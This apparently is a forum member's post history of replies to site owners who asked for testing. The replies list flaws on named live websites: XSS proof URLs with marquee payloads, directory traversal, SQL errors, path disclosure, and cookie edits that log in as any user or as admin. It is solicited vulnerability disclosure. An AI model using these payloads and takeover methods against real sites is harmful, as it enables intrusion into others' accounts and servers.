
agentsteal
Members
Posts: 230
Last visited: Never
Everything posted by agentsteal
-
Cross Site Scripting: There is Cross Site Scripting if the description contains code.
-
Array: http://www.mdoneonone.com/rrg/index.php?task=view&id[]
Array: http://www.mdoneonone.com/rrg/index.php?task=profile&p=2&id[]
Cross Site Scripting: http://www.mdoneonone.com/rrg/index.php?task=profile&p=2&id="><marquee><h1>vulnerable</marquee>
Cross Site Scripting: There is Cross Site Scripting on http://www.mdoneonone.com/rrg/index.php?task=search if a search contains code.
Cross Site Scripting: There is Cross Site Scripting if your username contains code.
Cross Site Scripting: http://www.mdoneonone.com/rrg/index.php?task=view&id="><marquee><h1>vulnerable</marquee>
Full Path Disclosure: http://www.mdoneonone.com/includes/
Full Path Disclosure: http://www.mdoneonone.com/rrg/index.php?task=view
Full Path Disclosure: http://www.mdoneonone.com/rrg/index.php?cat_id=3&page
Full Path Disclosure: http://www.mdoneonone.com/rrg/content/media.php
Insecure Cookie: You shouldn't put the password in the cookie.
Insecure Cookie: You shouldn't put the username in the cookie.
You can log in as any user by changing the ava_username cookie and the ava_code cookie to their username and password.
-
Array: http://www.antiup.net/account.php?id[]
Cross Site Scripting: There is Cross Site Scripting in the image upload.
Cross Site Scripting: There is Cross Site Scripting in the swf upload.
Full Path Disclosure: http://www.antiup.net/delete.php
Insecure Cookie: You shouldn't put the password in the cookie.
Insecure Cookie: You shouldn't put the username in the cookie.
User Enumeration: http://www.antiup.net/~root
-
Admin Access: You can log in as admin by changing the user cookie to 18.
Array: http://www.eastlancsmedicalservices.co.uk/ipAddresses.php?add[]
Array: http://www.eastlancsmedicalservices.co.uk/oohBible.php?dir[]
Cross Site Scripting: http://www.eastlancsmedicalservices.co.uk/ipAddresses.php?add=<marquee>vulnerable
Cross Site Scripting: There is Cross Site Scripting in the contacts if the fields contain ">code.
Cross Site Scripting: There is Cross Site Scripting on http://www.eastlancsmedicalservices.co.uk/idSearch.php if the id number contains code.
Cross Site Scripting: http://www.eastlancsmedicalservices.co.uk/oohBible.php?dir=<marquee><h1>vulnerable</marquee>
Cross Site Scripting: There is Cross Site Scripting when you edit a profile if the fields contain '>code.
Cross Site Scripting: http://www.eastlancsmedicalservices.co.uk/checkProcessingJobs.php?supUser=<marquee><h1>vulnerable</marquee>
Cross Site Scripting: http://www.eastlancsmedicalservices.co.uk/viewShiftReportAll.php?s=<marquee><h1>vulnerable</marquee>
Cross Site Scripting: http://www.eastlancsmedicalservices.co.uk/checkProcessingJobs.php?s=<marquee><h1>vulnerable</marquee>
Directory Traversal: http://www.eastlancsmedicalservices.co.uk/oohBible.php?dir=../
Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/cal.php?mon[]
Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/checkProcessingJobs.php?s[]
Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/checkProcessingJobs.php?supUser=a
Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/checkProcessingJobs.php?supUser[]
Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/adminModual.php
Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/callLog.php
Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/holidayRota.php
Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/nav.php
Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/login.php
Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/left.php
Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/right.php
Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/rota.php
Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/viewRequestedShifts.php
Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/shiftReportModual.php
Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/shifts.php
Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/viewShiftReport.php?mon[]
Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/viewServices.php?s[]
Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/viewUsers.php?s[]
Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/viewSites.php?s[]
Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/viewShiftReportAll.php?s[]
Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/viewSites.php?s=-1
Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/viewUsers.php?s=-1
Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/viewServices.php?s=-1
Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/oohBible.php?dir=a
Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/pages.php
You can log in as any user if you change the user cookie to their user id.
SQL Error: http://www.eastlancsmedicalservices.co.uk/viewShiftReportAll.php?s=a
SQL Error: There is an SQL Error on http://www.eastlancsmedicalservices.co.uk/idSearch.php if the id number contains an invalid value.
SQL Error: http://www.eastlancsmedicalservices.co.uk/checkProcessingJobs.php?supUser='
SQL Error: http://www.eastlancsmedicalservices.co.uk/checkProcessingJobs.php?s=-1
SQL Error: http://www.eastlancsmedicalservices.co.uk/editJob.php
SQL Error: http://www.eastlancsmedicalservices.co.uk/edit4weekRota.php
-
Admin Access: Anyone can get your username and password through the PHP Source Code Disclosure.
Admin Access: Anyone can edit the files on the site through the Directory Traversal.
Admin Access: If you upload a PHP file you can run PHP code on the server.
Cross Site Scripting: There is Cross Site Scripting when you register if your username contains >code.
Directory Traversal: There is Directory Traversal if your username contains ../
Directory Traversal: http://www.filepile.ca/pdoc.php?url=Li4vaW5kZXguaHRtbA
Directory Traversal: http://www.filepile.ca/account.php?f=Li4v
Directory Traversal: There is Directory Traversal if you create a folder that contains ../
Directory Traversal: There is Directory Traversal if you move a folder that contains ../
Directory Traversal: There is Directory Traversal if you delete a folder that contains ../
Directory Traversal: There is Directory Traversal if you delete a file that contains ../
Directory Traversal: There is Directory Traversal if you move a file that contains ../
Full Path Disclosure: http://www.filepile.ca/move.php?f[]
Full Path Disclosure: http://www.filepile.ca/account.php?f[]
Full Path Disclosure: http://www.filepile.ca/ppub.php?url[]
Full Path Disclosure: There is Full Path Disclosure if your username contains ../
Full Path Disclosure: http://www.filepile.ca/pdoc.php?url[]
Full Path Disclosure: http://www.filepile.ca/doc.php?f[]
Full Path Disclosure: There is Full Path Disclosure on http://www.filepile.ca/pdoc.php?url[] if you submit the download.
Full Path Disclosure: http://www.filepile.ca/phpinfo.php
Full Path Disclosure: http://www.filepile.ca/error_log
PHP Source Code Disclosure: There is PHP Source Code Disclosure on http://www.filepile.ca/pdoc.php if the url is set to the base64 of a PHP page.
PHP Source Code Disclosure: There is PHP Source Code Disclosure on http://www.filepile.ca/doc.php if the f is set to the base64 of a PHP page.
User Enumeration: http://www.filepile.ca/~matts15
User Enumeration: http://www.filepile.ca/~nobody
User Enumeration: http://www.filepile.ca/~root
You can access any user's files in http://www.filepile.ca/members/.
-
Cross Site Scripting: There is Cross Site Scripting when you log in if your username contains ">code.
Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain ">code.
Cross Site Scripting: There is Cross Site Scripting in the profile if the fields contain ">code.
User Enumeration: http://www.socialgrabbr.com/~pokebash
User Enumeration: http://www.socialgrabbr.com/~root
-
Array: http://www.wikiproxy.net/view.php?e[]
Array: http://www.wikiproxy.net/view.php?t[]
Array: http://www.wikiproxy.net/login.php?e[]
Array: http://www.wikiproxy.net/login.php?t[]
Array: http://www.wikiproxy.net/logout.php?e[]
Array: http://www.wikiproxy.net/logout.php?t[]
Cross Site Scripting: http://www.wikiproxy.net/view.php?e="><marquee><h1>vulnerable</marquee>
Cross Site Scripting: http://www.wikiproxy.net/view.php?t="><marquee><h1>vulnerable</marquee>
Cross Site Scripting: http://www.wikiproxy.net/login.php?e="><marquee><h1>vulnerable</marquee>
Cross Site Scripting: http://www.wikiproxy.net/login.php?t="><marquee><h1>vulnerable</marquee>
Cross Site Scripting: http://www.wikiproxy.net/logout.php?e="><marquee><h1>vulnerable</marquee>
Cross Site Scripting: http://www.wikiproxy.net/logout.php?t="><marquee><h1>vulnerable</marquee>
Cross Site Scripting: There is Cross Site Scripting when you log in if the fields contain ">code.
Cross Site Scripting: There is Cross Site Scripting when you create a ticket if the fields contain ">code.
-
PHP Youtube Search Count, Retrieve Video.
agentsteal replied to phpSensei's topic in Beta Test Your Stuff!
Cross Site Scripting: There is Cross Site Scripting if the search contains code.
Cross Site Scripting: There is Cross Site Scripting if the search contains ">code.
User Enumeration: http://www.render-works.com/~root
-
Array: http://www.tune.pk/view_channel.php?user[]
Cross Site Scripting: http://www.tune.pk/compose.php?msg=<marquee><h1>vulnerable</marquee>
Full Path Disclosure: http://www.tune.pk/phpinfo.php
Full Path Disclosure: http://www.tune.pk/channels.php?page=-1
Full Path Disclosure: http://www.tune.pk/channels.php?order[]
Full Path Disclosure: http://www.tune.pk/includes/classes/captcha/example.php?code[]
Full Path Disclosure: http://www.tune.pk/includes/classes/captcha/example2.php?code[]
Full Path Disclosure: http://www.tune.pk/includes/active.php
Full Path Disclosure: http://www.tune.pk/includes/defined_links.php
Full Path Disclosure: http://www.tune.pk/includes/modules.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/adodb.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/contrib/toxmlrpc.inc.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/datadict/datadict-firebird.inc.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/drivers/adodb-pdo_mssql.inc.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/drivers/adodb-pdo_mysql.inc.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/drivers/adodb-pdo_oci.inc.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/drivers/adodb-pdo_pgsql.inc.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/drivers/adodb-sybase_ase.inc.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/pear/Auth/Container/ADOdb.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/session/adodb-compress-bzip2.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/session/adodb-encrypt-secret.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/session/old/adodb-cryptsession.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/session/old/adodb-session-clob.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/session/old/adodb-session.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/benchmark.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/pdo.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/test-active-record.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/test-active-recs2.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/test-datadict.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/test-php5.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/test-xmlschema.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/test.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/test2.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/test3.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/test4.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/testcache.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/testdatabases.inc.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/testoci8.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/testoci8cursor.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/testpaging.php
Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/testpear.php
Full Path Disclosure: http://www.tune.pk/includes/classes/TFile.php
Full Path Disclosure: http://www.tune.pk/includes/playerconfig/config.xml.php
Full Path Disclosure: http://www.tune.pk/includes/templatelib/Template_Compiler.class.php
Full Path Disclosure: http://www.tune.pk/includes/templatelib/plugins/modifier.date_format.php
Includes Directory: http://www.tune.pk/includes/
Insecure Cookie: You shouldn't put the username in the cookie.
SQL Dump: http://www.tune.pk/includes/adodb/session/adodb-sessions.mysql.sql
SQL Dump: http://www.tune.pk/includes/adodb/session/adodb-sessions.oracle.clob.sql
SQL Dump: http://www.tune.pk/includes/adodb/session/adodb-sessions.oracle.sql
SQL Dump: http://www.tune.pk/includes/adodb/tests/test-datadict.php
User Enumeration: http://www.tune.pk/~tuneepk
-
Cross Site Scripting: There is Cross Site Scripting if the email address contains ">code.
Cross Site Scripting: There is Cross Site Scripting if the referrer contains ">code.
Cross Site Scripting: There is Cross Site Scripting if the style contains ">code.
Cross Site Scripting: There is Cross Site Scripting if the name contains ">code.
Cross Site Scripting: There is Cross Site Scripting if the hits contains ">code.
Cross Site Scripting: There is Cross Site Scripting if the ip address contains ">code.
Full Path Disclosure: http://www.omfg.ws/count3.0/counter.php?u=main&style[]
Full Path Disclosure: http://www.omfg.ws/count3.0/counter.php
Full Path Disclosure: http://www.omfg.ws/count3.0/counter.php?w[]
Full Path Disclosure: http://www.omfg.ws/count3.0/counter.php?u=main&style=a
Full Path Disclosure: There is Full Path Disclosure if the name is set to an invalid value.
Log File: http://www.omfg.ws/log.html
SQL Dump: http://www.omfg.ws/count3.0/db.txt
-
Cross Site Scripting: There is Cross Site Scripting if your username contains code.
Null User: You can register a null password.
Null User: You can register a null username.
SQL Error: There is an SQL Error when you vote if the poll_id contains an invalid value.
-
Array: http://www.inet411.com/tools/validate-pagerank/index.html?site[]
Array: http://www.inet411.com/ads/ads.ads?id=1&site[]
Cross Site Scripting: http://www.inet411.com/<marquee><h1>vulnerable
Cross Site Scripting: http://www.inet411.com/tools/validate-pagerank/index.html?site=<marquee><h1>vulnerable
Cross Site Scripting: http://www.inet411.com/3rdparty/php_file_tree/demo_classic.php/<marquee><h1>vulnerable</marquee>
Cross Site Scripting: http://www.inet411.com/ads/ads.ads?id=1&site=<marquee><h1>vulnerable</marquee>
Cross Site Scripting: There is Cross Site Scripting on http://www.inet411.com/ads/create_ad.html if the fields contain ">code.
Cross Site Scripting: http://www.inet411.com/tools/expired-domains-with-pagerank/index.html?page=<marquee><h1>vulnerable
Full Path Disclosure: http://www.inet411.com/rss-feeds/clickbank/clickbank.feed
Full Path Disclosure: There is Full Path Disclosure on http://www.inet411.com/tools/validate-pagerank/index.html if the URL is invalid.
Full Path Disclosure: http://www.inet411.com/rss-feeds/clickbank/clickbank.feed?q=a
Full Path Disclosure: http://www.inet411.com/3rdparty/php_file_tree/demo_classic.php
Full Path Disclosure: http://www.inet411.com/tools/validate-pagerank/index.html?site='
Full Path Disclosure: http://www.inet411.com/tools/expired-domains-with-pagerank/index.html?page[]
Full Path Disclosure: http://www.inet411.com/tools/expired-domains-with-pagerank/index.html?page=a
User Enumeration: http://www.inet411.com/~inet411
-
Array: http://www.omfg.ws/count2.0/counter.php?u=main&style[]
Cross Site Scripting: There is Cross Site Scripting if the email address contains ">code.
Cross Site Scripting: http://www.omfg.ws/count2.0/counter.php?u=<marquee><h1>vulnerable</marquee>
Directory Traversal: http://www.omfg.ws/count2.0/counter.php?a&u=../counter&style=2&w=11&h=15&meh.jpg
Full Path Disclosure: There is Full Path Disclosure if the name is null.
Full Path Disclosure: http://www.omfg.ws/count2.0/counter.php
Full Path Disclosure: http://www.omfg.ws/count2.0/counter.php?w[]
Full Path Disclosure: http://www.omfg.ws/count2.0/counter.php?u=main&style=a
Full Path Disclosure: http://www.omfg.ws/count2.0/counter.php?u=a
Log File: http://www.omfg.ws/log.html
-
My PHP youtube download script
agentsteal replied to winmastergames's topic in Beta Test Your Stuff!
Array: http://www2.winmastergames.com:82/youdownload/hashlink.php?vidid[]
Array: http://www2.winmastergames.com:82/youdownload/opendataconnection.php?vidid[]
Cross Site Scripting: http://www2.winmastergames.com:82/youdownload/hashlink.php?vidid=<marquee><h1>vulnerable</marquee>
Cross Site Scripting: http://www2.winmastergames.com:82/youdownload/opendataconnection.php?vidid=<marquee><h1>vulnerable</marquee>
Full Path Disclosure: http://www2.winmastergames.com:82/youdownload/yonderdowntest.php?url=http://www.youtube.com
Full Path Disclosure: http://www2.winmastergames.com:82/youdownload/yonderdowntest2.php?url=http://www.youtube.com
-
Cross Site Scripting: http://www.interpim.com/testme/index.php?page=<marquee><h1>vulnerable</marquee>
Cross Site Scripting: There is Cross Site Scripting when you sign the guestbook if the fields contain code.
-
Cross Site Scripting: There is Cross Site Scripting when you log in if your username contains '>code.
Insecure Cookie: You shouldn't put the username in the cookie.
User Enumeration: http://www.trenttompkins.com/~nobody
User Enumeration: http://www.trenttompkins.com/~root
User Enumeration: http://www.trenttompkins.com/~trenttom
-
Array: http://www.wiuartinny.com/thumb.php?src[]
Cross Site Scripting: There is Cross Site Scripting when you upload an image if the title contains code.
Directory Traversal: http://www.wiuartinny.com/thumb.php?src=../images/title.jpg&display=medium
Drop Down Menu: If you edit the drop down menu on http://www.wiuartinny.com/account.php you can submit arbitrary values.
DOS: There is a DOS if you submit 9999999999999999999999 in the drop down menu on http://www.wiuartinny.com/account.php.
Full Path Disclosure: http://www.wiuartinny.com/gallery.php?id[]
Full Path Disclosure: http://www.wiuartinny.com/thumb.php
Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie contains an invalid value.
Full Path Disclosure: http://www.wiuartinny.com/thumb.php?src=a
Full Path Disclosure: http://www.wiuartinny.com/thumb.php?src=655.jpg
Full Path Disclosure: http://www.wiuartinny.com/account.php?page[]
SQL Error: http://www.wiuartinny.com/gallery.php?page='
SQL Error: http://www.wiuartinny.com/account.php?page='
-
Make your own website with ComfyPage
agentsteal replied to cameronjdavis's topic in Beta Test Your Stuff!
Array: http://www.comfypage.com/index.php?postback=My+ComfyPage+Signup&email[]
Array: http://my.comfypage.com/agentsteal/function.php?function=Appointment%20Request&success[]
Array: http://my.comfypage.com/agentsteal/mail.php?success[]
Array: http://my.comfypage.com/agentsteal/files.php?folder[]
Array: http://www.comfypage.com/index.php?postback=My+ComfyPage+Signup&password[]
Array: http://www.comfypage.com/index.php?postback=Mailing+List&list_email[]
Array: http://www.comfypage.com/index.php?content_id=2&postback=Contact+Form&email[]
Cross Site Scripting: http://www.comfypage.com/index.php?postback=My+ComfyPage+Signup&email="><marquee><h1>vulnerable</marquee>
Cross Site Scripting: http://www.comfypage.com/index.php?postback=My+ComfyPage+Signup&password="><marquee><h1>vulnerable</marquee>
Cross Site Scripting: http://www.comfypage.com/index.php?postback=Mailing+List&list_email="><marquee><h1>vulnerable</marquee>
Cross Site Scripting: http://my.comfypage.com/agentsteal/function.php?function=Appointment Request&success=<marquee><h1>vulnerable
Cross Site Scripting: http://my.comfypage.com/agentsteal/mail.php?success=<marquee><h1>vulnerable
Cross Site Scripting: There is Cross Site Scripting on http://my.comfypage.com/agentsteal/function.php?function=Mailing List if the fields contain </textarea>code.
Cross Site Scripting: There is Cross Site Scripting on http://my.comfypage.com/agentsteal/files.php if a folder contains ">code.
Cross Site Scripting: There is Cross Site Scripting if your email address contains ">code.
Cross Site Scripting: There is Cross Site Scripting when you contact support if your email address contains ">code.
Cross Site Scripting: There is Cross Site Scripting on http://my.comfypage.com/agentsteal/register_with_existing_domain.php if the domain contains ">code.
Cross Site Scripting: There is Cross Site Scripting when you contact support if your message contains </textarea>code.
Cross Site Scripting: There is Cross Site Scripting when you add a product if the fields contain code.
Cross Site Scripting: There is Cross Site Scripting on http://my.comfypage.com/agentsteal/function.php?function=Appointment Request if the fields contain ">code.
Cross Site Scripting: http://www.comfypage.com/index.php?content_id=2&postback=Contact+Form&email="><marquee><h1>vulnerable</marquee>
Drop Down Menu: If you edit the drop down menus on http://my.comfypage.com/agentsteal/admin.php you can submit arbitrary values.
Full Path Disclosure: http://my.comfypage.com/agentsteal1/admin.php?copy
Full Path Disclosure: http://www.comfypage.com/index.php?content_id=2&postback=Contact+Form&message[]
Full Path Disclosure: There is Full Path Disclosure on http://my.comfypage.com/agentsteal/register_confirm.php when you submit the form.
Full Path Disclosure: http://my.comfypage.com/agentsteal/margins.php?edit[]
Full Path Disclosure: http://my.comfypage.com/agentsteal/function.php
Full Path Disclosure: http://my.comfypage.com/agentsteal/files.php?folder=a
-
php Squares (aka superbowl squares)
agentsteal replied to chiefrokka's topic in Beta Test Your Stuff!
Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code.
Cross Site Scripting: There is Cross Site Scripting on http://www.phppicks.com/Demo_Pickems/Admin.php if the fields contain code.
Cross Site Scripting: There is Cross Site Scripting on http://www.phppicks.com/Demo_Pickems/Admin.php if the drop down menus contain code.
Cross Site Scripting: There is Cross Site Scripting on http://www.phppicks.com/Demo_Squares/MySquares.php if the drop down menu contains </select>code.
Cross Site Scripting: There is Cross Site Scripting on http://www.phppicks.com/Demo_Squares/Print_Squares.php if the drop down menu contains </select>code.
Cross Site Scripting: There is Cross Site Scripting on http://www.phppicks.com/Demo_Squares/Price_I_Owe.php if the drop down menu contains </select>code.
Drop Down Menu: If you edit the drop down menus on http://www.phppicks.com/Demo_Pickems/Admin.php you can submit arbitrary values.
Drop Down Menu: If you edit the drop down menu on http://www.phppicks.com/Demo_Squares/MySquares.php you can submit arbitrary values.
Drop Down Menu: If you edit the drop down menu on http://www.phppicks.com/Demo_Squares/MySquares.php you can submit arbitrary values.
Drop Down Menu: If you edit the drop down menu on http://www.phppicks.com/Demo_Squares/Price_I_Owe.php you can submit arbitrary values.
Maximum Length: If you edit the input boxes on http://www.phppicks.com/Demo_Pickems/Admin.php you can submit arbitrary values.
-
Array: http://vampirecity.cx-music.com/covensimwith.php?u[]
Array: http://vampirecity.cx-music.com/friendswith.php?u[]
Array: http://vampirecity.cx-music.com/friendsof.php?u[]
Array: http://vampirecity.cx-music.com/contest.php?contest[]
Array: http://vampirecity.cx-music.com/miq.php?mi[]
Array: http://vampirecity.cx-music.com/bdays.php?bmonth[]
Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code.
Cross Site Scripting: There is Cross Site Scripting when you edit your profile if the fields contain ">code.
Cross Site Scripting: There is Cross Site Scripting in the videos if the fields contain code.
Cross Site Scripting: There is Cross Site Scripting in the pictures if a comment contains code.
Cross Site Scripting: There is Cross Site Scripting when you submit questions if the mi contains ">code.
Drop Down Menu: If you edit the drop down menus on the edit profile page you can submit arbitrary values.
Full Path Disclosure: http://vampirecity.cx-music.com/includes/footer.php
Full Path Disclosure: http://vampirecity.cx-music.com/games/includes/footer.php
Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is set to an invalid value.
Full Path Disclosure: http://vampirecity.cx-music.com/bdays.php?orderby='
Full Path Disclosure: http://vampirecity.cx-music.com/forum/includes/footer.php
Full Path Disclosure: http://vampirecity.cx-music.com/ShoppingCart.php
Includes Directory: http://vampirecity.cx-music.com/inc/
Includes Directory: http://vampirecity.cx-music.com/includes/
Includes Directory: http://vampirecity.cx-music.com/games/
Includes Directory: http://vampirecity.cx-music.com/forum/includes/
Log File: http://vampirecity.cx-music.com/images/WS_FTP.LOG
-
The OP sent me a request to remove the links. As most of the errors were due to manipulating the URLs, I sent the OP the original content of this post for reference. -- roopurt18
-
Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code.
-
http://www.DebateATopic.com - Now Live!
agentsteal replied to clanstyles's topic in Beta Test Your Stuff!
Cross Site Scripting: There is Cross Site Scripting if a debate's title contains code.
-
Collaborative poetry project - venuspoetry.com
agentsteal replied to lumidev's topic in Beta Test Your Stuff!
User Enumeration: http://www.venuspoetry.com/~root
User Enumeration: http://www.venuspoetry.com/~venus
-
www.forumpix.co.uk - Please test and give feedback
agentsteal replied to phillips321's topic in Beta Test Your Stuff!
Full Path Disclosure: There is Full Path Disclosure if you upload an invalid image.